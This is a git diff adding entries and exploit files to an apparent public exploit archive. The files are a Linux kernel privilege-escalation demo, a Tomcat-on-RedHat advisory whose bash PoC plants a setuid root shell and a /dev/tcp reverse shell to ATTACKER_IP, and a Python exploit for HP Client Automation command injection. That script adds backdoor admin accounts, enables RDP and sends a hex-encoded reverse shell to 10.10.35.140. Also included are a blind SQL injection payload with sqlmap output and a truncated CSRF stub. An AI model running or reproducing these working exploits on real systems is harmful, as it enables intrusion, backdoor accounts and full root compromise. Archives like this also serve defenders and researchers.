diff --git a/files.csv b/files.csv index 9dec1da3b..cde6f0e23 100755 --- a/files.csv +++ b/files.csv @@ -36598,6 +36598,15 @@ id,file,description,date,author,platform,type,port 40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0 40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0 40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0 +40481,platforms/php/webapps/40481.txt,"ShoreTel Connect ONSITE - Blind SQL Injection",2016-09-19,"Iraklis Mathiopoulos",php,webapps,0 40482,platforms/windows/local/40482.txt,"Fitbit Connect Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0 +40483,platforms/windows/local/40483.txt,"Leap Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0 +40484,platforms/windows/local/40484.txt,"Wacom Consumer Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0 +40485,platforms/windows/local/40485.txt,"Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0 40486,platforms/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,php,webapps,0 40487,platforms/php/webapps/40487.txt,"PHP Press Release - Stored Cross Site Scripting",2016-10-09,Besim,php,webapps,0 +40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0 +40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0 +40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0 +40491,platforms/multiple/remote/40491.py,"HP Client - Automation Command Injection / Remote Code Execution",2016-10-10,SlidingWindow,multiple,remote,0 +40492,platforms/php/webapps/40492.html,"Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0 diff --git a/platforms/lin_x86-64/local/40489.txt b/platforms/lin_x86-64/local/40489.txt new file mode 100755 index 000000000..6f1829ea6 --- /dev/null +++ b/platforms/lin_x86-64/local/40489.txt @@ -0,0 +1,42 @@ +# Exploit Title: Linux kernel <= 4.6.2 - Local Privileges Escalation via IP6T_SO_SET_REPLACE compat setsockopt call +# Date: 2016.10.8 +# Exploit Author: Qian Zhang@MarvelTeam Qihoo 360 +# Version: Linux kernel <= 4.6.2 +# Tested on: Ubuntu 16.04.1 LTS Linux 4.4.0-21-generic +# CVE: CVE-2016-4997 +# Reference:http://www.openwall.com/lists/oss-security/2016/09/29/10 +# Contact: tyrande000@gmail.com + +#DESCRIPTION +#=========== +#The IPv6 netfilter subsystem in the Linux kernel through 4.6.2 does not validate certain offset fields, +#which allows local users to escalade privileges via an IP6T_SO_SET_REPLACE compat setsockopt call with ip6_tables module loaded. + +zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ls +compile.sh enjoy enjoy.c pwn pwn.c version.h +zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ sudo modprobe ip6_tables +[sudo] password for zhang_q: +zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ./pwn +pwn begin, let the bullets fly . . . +and wait for a minute . . . +pwn over, let's enjoy! +preparing payload . . . +trigger modified tty_release . . . +got root, enjoy :) +root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# +root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# id +uid=0(root) gid=0(root) groups=0(root) +root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# hostnamectl + Static hostname: ubuntu + Icon name: computer-vm + Chassis: vm + Machine ID: 355cdf4ce8a048288640c2aa933c018f + Virtualization: vmware + Operating System: Ubuntu 16.04.1 LTS + Kernel: Linux 4.4.0-21-generic + Architecture: x86-64 +root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40489.zip \ No newline at end of file diff --git a/platforms/linux/local/40488.txt b/platforms/linux/local/40488.txt new file mode 100755 index 000000000..8081a4206 --- /dev/null +++ b/platforms/linux/local/40488.txt @@ -0,0 +1,283 @@ +============================================= +- Discovered by: Dawid Golunski +- http://legalhackers.com +- dawid (at) legalhackers.com + +- CVE-2016-5425 +- Release date: 10.10.2016 +- Revision: 1 +- Severity: High +============================================= + + +I. VULNERABILITY +------------------------- + +Apache Tomcat (packaging on RedHat-based distros) - Root Privilege Escalation + + +II. BACKGROUND +------------------------- + +"The Apache Tomcat® software is an open source implementation of the +Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket +technologies. The Java Servlet, JavaServer Pages, Java Expression Language +and Java WebSocket specifications are developed under the Java Community +Process. + +The Apache Tomcat software is developed in an open and participatory +environment and released under the Apache License version 2. +The Apache Tomcat project is intended to be a collaboration of the +best-of-breed developers from around the world. + +Apache Tomcat software powers numerous large-scale, mission-critical web +applications across a diverse range of industries and organizations. +Some of these users and their stories are listed on the PoweredBy wiki page. +" + +http://tomcat.apache.org/ + + +III. INTRODUCTION +------------------------- + +Apache Tomcat packages provided by default repositories of RedHat-based +distributions (including CentOS, RedHat, OracleLinux, Fedora, etc.) +create a tmpfiles.d configuration file with insecure permissions which +allow attackers who are able to write files with tomcat user permissions +(for example, through a vulnerability in web application hosted on Tomcat) +to escalate their privileges from tomcat user to root and fully compromise +the target system. + + +IV. DESCRIPTION +------------------------- + +The vulnerability stems from the tomcat.conf file installed by default +by packages on RedHat-based systems with write permissions for the tomcat +group: + +[root@centos7 ~]# ls -al /usr/lib/tmpfiles.d/tomcat.conf +-rw-rw-r--. 1 root tomcat 361 Oct 9 23:58 /usr/lib/tmpfiles.d/tomcat.conf + +The configuration files in tmpfiles.d are used by systemd-tmpfiles to manage +temporary files including their creation. + +Attackers could very easily exploit the weak permissions on tomcat.conf to +inject configuration that creates a rootshell or remote reverse shell that +allows them to execute arbitrary commands with root privileges. + +Injected malicious settings would be processed whenever +/usr/bin/systemd-tmpfiles gets executed. + +systemd-tmpfiles is executed by default on boot on RedHat-based systems +through systemd-tmpfiles-setup.service service as can be seen below: + + +---[ /usr/lib/systemd/system/systemd-tmpfiles-setup.service ]--- + +[...] +ExecStart=/usr/bin/systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev + +---------------------------------------------------------------- + +Depending on the system in use, the execution of systemd-tmpfiles could also +be triggered by other services, cronjobs, startup scripts etc. + + +The vulnerability could potentially get exploited by remote attackers in +combination with a vulnerable web application hosted on Tomcat if they +managed to find a path traversal (e.g in a file upload feature) or an arbitrary +file write/append vulnerability. This would allow them to append settings +to /usr/lib/tmpfiles.d/tomcat.conf file and achieve code execution with root +privileges without a prior local access/shell on the system. +This vector could prove useful to attackers, for example if they were unable to +obtain a tomcat-privileged shell/codeexec by uploading a .jsp webshell through a +vulnerable file upload feature due to restrictions imposed by Tomcat security +manager, or a read-only webroot etc. + +It is worth to note that systemd-tmpfiles does not stop on syntax errors when +processing configuration files which makes exploitation easier as attackers only +need to inject their payload after a new line and do not need to worry +about garbage data potentially prepended by a vulnerable webapp in case of +Arbitrary File Write/Append exploitation. + + + +V. PROOF OF CONCEPT EXPLOIT +------------------------- + +-----------[ tomcat-RH-root.sh ]--------- + +#!/bin/bash +# Apache Tomcat packaging on RedHat-based distros - Root Privilege Escalation PoC Exploit +# CVE-2016-5425 +# +# Full advisory at: +# http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html +# +# Discovered and coded by: +# Dawid Golunski +# http://legalhackers.com +# +# Tested on RedHat, CentOS, OracleLinux, Fedora systems. +# +# For testing purposes only. +# + +ATTACKER_IP=127.0.0.1 +ATTACKER_PORT=9090 + +echo -e "\n* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *" +echo -e " Discovered by Dawid Golunski\n" +echo "[+] Checking vulnerability" +ls -l /usr/lib/tmpfiles.d/tomcat.conf | grep 'tomcat' +if [ $? -ne 0 ]; then + echo "Not vulnerable or tomcat installed under a different user than 'tomcat'" + exit 1 +fi +echo -e "\n[+] Your system is vulnerable!" + +echo -e "\n[+] Appending data to /usr/lib/tmpfiles.d/tomcat.conf..." +cat<<_eof_>>/usr/lib/tmpfiles.d/tomcat.conf +C /usr/share/tomcat/rootsh 4770 root root - /bin/bash +z /usr/share/tomcat/rootsh 4770 root root - +F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0<&1 2>&1 & \n\n" +_eof_ + +echo "[+] /usr/lib/tmpfiles.d/tomcat.conf contains:" +cat /usr/lib/tmpfiles.d/tomcat.conf +echo -e "\n[+] Payload injected! Wait for your root shell...\n" +echo -e "Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc.), +the rootshell will be created in /usr/share/tomcat/rootsh. +Additionally, a reverse shell should get executed by crond shortly after and connect to $ATTACKER_IP:$ATTACKER_PORT \n" + + +--------------[ eof ]-------------------- + + +Example run: + +-bash-4.2$ rpm -qa | grep -i tomcat +tomcat-7.0.54-2.el7_1.noarch + +-bash-4.2$ cat /etc/redhat-release +CentOS Linux release 7.2.1511 (Core) + +-bash-4.2$ id +uid=91(tomcat) gid=91(tomcat) groups=91(tomcat) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 + +-bash-4.2$ ./tomcat-RH-root.sh + +* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 * + Discovered by Dawid Golunski + +[+] Checking vulnerability +-rw-rw-r--. 1 root tomcat 43 Oct 10 02:39 /usr/lib/tmpfiles.d/tomcat.conf + +[+] Your system is vulnerable! + +[+] Appending data to /usr/lib/tmpfiles.d/tomcat.conf... +[+] /usr/lib/tmpfiles.d/tomcat.conf contains: +f /var/run/tomcat.pid 0644 tomcat tomcat - +C /usr/share/tomcat/rootsh 4770 root root - /bin/bash +z /usr/share/tomcat/rootsh 4770 root root - +F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/127.0.0.1/9090 0<&1 2>&1 & \n\n" + +[+] Payload injected! Wait for your root shell... + +Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc.), +the rootshell will be created in /usr/share/tomcat/rootsh. +Additionally, a reverse shell should get executed by crond shortly after and connect to 127.0.0.1:9090 + +-bash-4.2$ nc -l -p 9090 +bash: no job control in this shell +[root@centos7 ~]# id +id +uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023 + +[root@centos7 ~]# ls -l /usr/share/tomcat/rootsh +ls -l /usr/share/tomcat/rootsh +-rwsrwx---. 1 root root 960392 Aug 2 12:00 /usr/share/tomcat/rootsh +[root@centos7 ~]# + + + +VI. BUSINESS IMPACT +------------------------- + +Attackers who have gained access to tomcat user account or the ability to +write files as tomcat user could escalate their privileges to root and fully +compromise the affected system. + +As explained in section IV., the vulnerability could potentially get exploited +by remote attackers in combination with certain web application vulnerabilities +to achieve command execution without prior shell access. + + +VII. SYSTEMS AFFECTED +------------------------- + +Multiple versions of Tomcat packages on RedHat-based systems are affected. + +The vulnerability was confirmed on Tomcat installed from default repositories +on the following systems: + +- CentOS +- Fedora +- Oracle Linux +- RedHat + +Refer to information provided by your distribution to obtain an exact list +of vulnerable packages. + + +Detailes provided by RedHat can be found at: + +https://access.redhat.com/security/cve/CVE-2016-5425 + + +VIII. SOLUTION +------------------------- + +Adjust permissions on /usr/lib/tmpfiles.d/tomcat.conf file to remove write +permission for the tomcat group. + +Alternatively, update to the latest packages provided by your distribution. +Confirm the file permissions after the update. + + +IX. REFERENCES +------------------------- + +http://legalhackers.com + +http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html + +The source code of the exploit (tomcat-RH-root.sh) can be downloaded from: +http://legalhackers.com/exploits/tomcat-RH-root.sh + +CVE-2016-5425 +http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5425 + +https://access.redhat.com/security/cve/CVE-2016-5425 + + +X. CREDITS +------------------------- + +The vulnerability has been discovered by Dawid Golunski +dawid (at) legalhackers (dot) com +http://legalhackers.com + +XI. REVISION HISTORY +------------------------- + +10.10.2016 - Advisory released + +XII. LEGAL NOTICES +------------------------- + +The information contained within this advisory is supplied "as-is" with +no warranties or guarantees of fitness of use or otherwise. I accept no +responsibility for any damage caused by the use or misuse of this information. \ No newline at end of file diff --git a/platforms/multiple/remote/40491.py b/platforms/multiple/remote/40491.py new file mode 100755 index 000000000..620d2a729 --- /dev/null +++ b/platforms/multiple/remote/40491.py @@ -0,0 +1,212 @@ +# Exploit Title: [HP Client - Automation Command Injection] +# Date: [10/10/2016] +# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot +# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/] +# Version: [Tested on version 7.9 but should work on 8.1, 9.0, 9.1 too] +# Tested on: [Windows 7 and CentOS release 6.7 (Final)] +# CVE : [CVE-2015-1497] + +#Can run following commands on linux target + #Useradd Payload: hide hide sh -c ' useradd amiroot -p ID/JlXFIWowsE -g root' + #Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" + + +#Runs following commands on Windows target + #hide hide cmd.exe /c net user hack3r "hack3r" /add + #hide hide cmd.exe /c net localgroup administrators hack3r /add + #hide hide cmd.exe /c net localgroup "Remote Desktop Users" hack3r /add + #hide hide cmd.exe /c netsh firewall set service RemoteDesktop enable + #hide hide cmd/exe /c netsh firewall set service type=RemoteDesktop mode=enable profile=ALL + #hide hide cmd/exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f + + +import sys,socket + +print("\n# Exploit Title: [HP Client - Automation Command Injection]\n# Date: [10/10/2016]\n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot\n# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]\n# Version: [7.9, 8.1, 9.0, 9.1]\n# Tested on: [Windows 7, CentOS release 6.7 (Final)]\n# CVE : [CVE-2015-1497]\n") + +def exploit_Linux(target_IP,exploit_param): + if exploit_param == "1": + print("\n[+]Adding privileged user amiroot/nopass") + request = "\x00" + request+= "\x31\x32\x33\x31\x32\x33\x00" + request+= "\x41\x42\x43\x00" + request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x27\x20\x75\x73\x65\x72\x61\x64\x64\x20\x61\x6d\x69\x72\x6f\x6f\x74\x20\x2d\x70\x20\x49\x44\x2f\x4a\x6c\x58\x46\x49\x57\x6f\x77\x73\x45\x20\x20\x2d\x67\x20\x72\x6f\x6f\x74\x27\x00" + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target_IP, 3465)) + s.send(request) + + response = s.recv(1024) + + if response == "\x00": + print("[+]Successfully added user amiroot/nopass") + else: + print("[-]Failed to add user amiroot/nopass") + s.close() + + elif exploit_param == "2": + print("\n[+]Trying to get a reverse shell") + request = "\x00" + request+= "\x31\x32\x33\x31\x32\x33\x00" + request+= "\x41\x42\x43\x00" + + #Change this + #Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" + request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x22\x70\x79\x74\x68\x6f\x6e\x20\x2d\x63\x20\x27\x69\x6d\x70\x6f\x72\x74\x20\x73\x6f\x63\x6b\x65\x74\x2c\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2c\x6f\x73\x3b\x73\x3d\x73\x6f\x63\x6b\x65\x74\x2e\x73\x6f\x63\x6b\x65\x74\x28\x73\x6f\x63\x6b\x65\x74\x2e\x41\x46\x5f\x49\x4e\x45\x54\x2c\x73\x6f\x63\x6b\x65\x74\x2e\x53\x4f\x43\x4b\x5f\x53\x54\x52\x45\x41\x4d\x29\x3b\x73\x2e\x63\x6f\x6e\x6e\x65\x63\x74\x28\x28\x5c\x22\x31\x30\x2e\x31\x30\x2e\x33\x35\x2e\x31\x34\x30\x5c\x22\x2c\x34\x34\x33\x29\x29\x3b\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x30\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x31\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x32\x29\x3b\x70\x3d\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x63\x61\x6c\x6c\x28\x5b\x5c\x22\x2f\x62\x69\x6e\x2f\x73\x68\x5c\x22\x2c\x5c\x22\x2d\x69\x5c\x22\x5d\x29\x3b\x27\x22\x00" + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target_IP, 3465)) + s.send(request) + + response = s.recv(1024) + + if response == "\x00": + print("[+]Exploit completed successfully.\n[+]Try to SSH into the target with username/password: amiroot/nopass") + else: + print("[-]Failed to get reverse shell") + s.close() + + else: + print("\n[-]Invalid exploit parameter provided for Linux target") + sys.exit() + + +def exploit_Windows(target_IP): + + counter = 0 + print("[+]Adding a local user hack3r/hack3r") + + request = "\x00" + request+= "\x31\x32\x33\x31\x32\x33\x00" + request+= "\x41\x42\x43\x00" + request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x68\x61\x63\x6b\x33\x72\x20\x22\x68\x61\x63\x6b\x33\x72\x22\x20\x2f\x61\x64\x64\x00" + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target_IP, 3465)) + s.send(request) + + response = s.recv(1024) + + if response == "\x00": + print("[+]Successfully added user hack3r/hack3r") + counter+= 1 + else: + print("[-]Failed to add user hack3r/hack3r") + s.close() + + + print("[+]Adding user 'hack3r' to Local Administrator's group") + request = "\x00" + request+= "\x31\x32\x33\x31\x32\x33\x00" + request+= "\x41\x42\x43\x00" + request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00" + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target_IP, 3465)) + s.send(request) + response = s.recv(1024) + + if response == "\x00": + print("[+]Successfully added user 'hack3r' to Local Administrators group") + counter+= 1 + else: + print("[-]Failed to add user to 'hack3r' Local Administrators group") + s.close() + + #Add user Hack3r to "Remote Desktop Users" Group + print("[+]Adding user 'hack3r' to 'Remote Desktop Users' group") + request = "\x00" + request+= "\x31\x32\x33\x31\x32\x33\x00" + request+= "\x41\x42\x43\x00" + request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x22\x52\x65\x6d\x6f\x74\x65\x20\x44\x65\x73\x6b\x74\x6f\x70\x20\x55\x73\x65\x72\x73\x22\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00" + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target_IP, 3465)) + s.send(request) + response = s.recv(1024) + + if response == "\x00": + print("[+]Successfully added user 'hack3r' to 'Remote Desktop Users' group") + counter+= 1 + else: + print("[-]Failed to add user 'hack3r' to 'Remote Desktop Users' group") + s.close() + + #Enable RDP + print("[+]Trying to enable Remote Desktop Service") + request = "\x00" + request+= "\x31\x32\x33\x31\x32\x33\x00" + request+= "\x41\x42\x43\x00" + request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x65\x6e\x61\x62\x6c\x65\x00" + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target_IP, 3465)) + s.send(request) + response = s.recv(1024) + + if response == "\x00": + print("[+]Successfully enabled Remote Desktop Service") + counter+= 1 + else: + print("[-]Failed to enable Remote Desktop Service") + s.close() + + + #Enable RDP for all profiles + print("[+]Trying to enable Remote Desktop Service for all firewall profiles") + request = "\x00" + request+= "\x31\x32\x33\x31\x32\x33\x00" + request+= "\x41\x42\x43\x00" + request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x74\x79\x70\x65\x3d\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x6d\x6f\x64\x65\x3d\x65\x6e\x61\x62\x6c\x65\x20\x70\x72\x6f\x66\x69\x6c\x65\x3d\x41\x4c\x4c\x00" + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target_IP, 3465)) + s.send(request) + response = s.recv(1024) + + if response == "\x00": + print("[+]Successfully enabled Remote Desktop Service for all firewall profiles") + counter+= 1 + else: + print("[-]Failed to enable Remote Desktop Service for all firewall profiles") + s.close() + + #Setup target to listen for RDP connections + print("[+]Setting up the target server to listen to RDP connections") + request = "\x00" + request+= "\x31\x32\x33\x31\x32\x33\x00" + request+= "\x41\x42\x43\x00" + request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x45\x59\x5f\x4c\x4f\x43\x41\x4c\x5f\x4d\x41\x43\x48\x49\x4e\x45\x5c\x53\x59\x53\x54\x45\x4d\x5c\x43\x75\x72\x72\x65\x6e\x74\x43\x6f\x6e\x74\x72\x6f\x6c\x53\x65\x74\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x5c\x54\x65\x72\x6d\x69\x6e\x61\x6c\x20\x53\x65\x72\x76\x65\x72\x22\x20\x2f\x76\x20\x66\x44\x65\x6e\x79\x54\x53\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x73\x20\x2f\x74\x20\x52\x45\x47\x5f\x44\x57\x4f\x52\x44\x20\x2f\x64\x20\x30\x20\x2f\x66\x00" + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target_IP, 3465)) + s.send(request) + response = s.recv(1024) + + if response == "\x00": + print("[+]Successfully setup the target server to listen to RDP connections") + counter+= 1 + else: + print("[-]Failed to setup the target server to listen to RDP connections") + s.close() + + if counter == 6: + print("\n[+]Exploit completed successfully. Try RDP to the target with username/password: hack3r/hack3r") + else: + print("\n[-]Exploit Failed..") + +#main() function here +def main(): + + if len(sys.argv) < 2: + print "\n[-]Usage: \nWindows Target:\n\tpython HP_Client_Automation_Exploit.py Windows\n\nLinux Target:\n\tpython HP_Client_Automation_Exploit.py Linux [1|2]\n\t\t1.Add user\n\t\t2.Reverse Shell" + sys.exit() + + target_IP = sys.argv[1] + target_OS = sys.argv[2].lower() + + if target_OS == "windows": + exploit_Windows(target_IP) + elif target_OS == "linux": + exploit_param = sys.argv[3] + exploit_Linux(target_IP,exploit_param) + else: + print("\n[-]Invalid taret Operating System selected.") + sys.exit() + +if __name__ == '__main__': + main() diff --git a/platforms/php/webapps/40481.txt b/platforms/php/webapps/40481.txt new file mode 100755 index 000000000..e500224cb --- /dev/null +++ b/platforms/php/webapps/40481.txt @@ -0,0 +1,87 @@ +# Exploit Title: ShoreTel Connect ONSITE Blind SQL Injection Vulnerability +# Date: 19-09-2016 +# Software Link: +https://www.shoretel.com/resource-center/shoretel-connect-onsite-overview +# Exploit Author: Iraklis Mathiopoulos +# Contact: https://twitter.com/_imath_ +# Website: https://medium.com/@iraklis +# Category: webapps + +1. Description + +Versions of ShoreTel Connect ONSITE prior and including 21.79.4311.0 +are vulnerable to a Blind SQL Injection in /authenticate.php, on the webserver +that is running the Conference system. + +Specifically, the POST parameter "username" is not sanitised prior to being used +in SQL Queries. Using test'%20and%20(select*from(select(sleep(35)))a)--%20 +for the username value the server will respond after approximately 35 seconds. + +No authentication is needed in order to exploit the vulnerability as the issue +resides in the pre-authentication realm of the system. + + +2. Proof of Concept + +req.burp: +--- +POST https://[REDACTED].com/authenticate.php HTTP/1.1 +Host: [REDACTED].com +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) +Gecko/20100101 Firefox/47.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Referer: https://[REDACTED].com/signin.php?ret=index.php&brand=1&brandUrl=index.php&rand=377311852 +Cookie: PHPSESSID=fd3eb46033541487cce7774b917c655d +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 197 + +password=cc03e747a6afbbcbf8be7668acfebee5&password64=dGVzdDEyMw%3D%3D&redirect=&redirectOnFail=&ticketAsQuery=1&expiry=43200&flashlogin=&ParticipantCode=&username=test123&vpassword=&SUBMIT1=Sign+In +- --- + +root@kali:~/projects# sqlmap -r req.burp -p username --dbms=mysql +--technique=T --time-sec=10 --level=5 --risk=3 --current-db + _ + ___ ___| |_____ ___ ___ {1.0-dev-nongit-201607120a89} +|_ -| . | | | .'| . | +|___|_ |_|_|_|_|__,| _| + |_| |_| http://sqlmap.org + + +[*] starting at 19:59:34 + +[19:59:34] [INFO] parsing HTTP request from 'req.burp' +[19:59:34] [INFO] testing connection to the target URL +[19:59:42] [INFO] checking if the target is protected by some kind of +WAF/IPS/IDS +sqlmap resumed the following injection point(s) from stored session: +- --- +Parameter: username (POST) + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (SELECT) + Payload: password=cc03e747a6afbbcbf8be7668acfebee5&password64=dGVzdDEyMw==&redirect=&redirectOnFail=&ticketAsQuery=1&expiry=43200&flashlogin=&ParticipantCode=&username=test123' +AND (SELECT * FROM (SELECT(SLEEP(10)))Qlhs) AND 'jIev' LIKE +'jIev&vpassword=&SUBMIT1=Sign In +- --- +[19:59:54] [INFO] testing MySQL +[20:02:25] [INFO] confirming MySQL +[20:03:12] [INFO] the back-end DBMS is MySQL +web application technology: Apache +back-end DBMS: MySQL >= 5.0.0 +[20:03:12] [INFO] fetching current database +[20:03:12] [INFO] retrieved: [REDACTED] +current database: '[REDACTED]' +[20:21:10] [INFO] fetched data logged to text files under +'/root/.sqlmap/output/[REDACTED].com' + +[*] shutting down at 20:21:10 + +3. Solution: + +Install the latest version of ShoreTel Connect ONSITE +https://support.shoretel.com/kb/view.php?id=kA41A000000XgL6SAK + +Related ShoreTel security bulletin: +https://support.shoretel.com/kb/view.php?id=kA41A000000XgL6SAK diff --git a/platforms/php/webapps/40492.html b/platforms/php/webapps/40492.html new file mode 100755 index 000000000..2291b8d87 --- /dev/null +++ b/platforms/php/webapps/40492.html @@ -0,0 +1,35 @@ +# Exploit Title : Maian Weblog 4.0 - Cross-Site Request +Forgery ( Add New Post) +# Author : Besim +# Google Dork : - +# Date : 10/10/2016 +# Type : webapps +# Platform : PHP +# Vendor Homepage : http://www.maianweblog.com +# Software link : + http://www.hotscripts.com/listings/jump/download/21864 + + + + +*########################### CSRF PoC ###############################* + + + + + +
+ + + + +
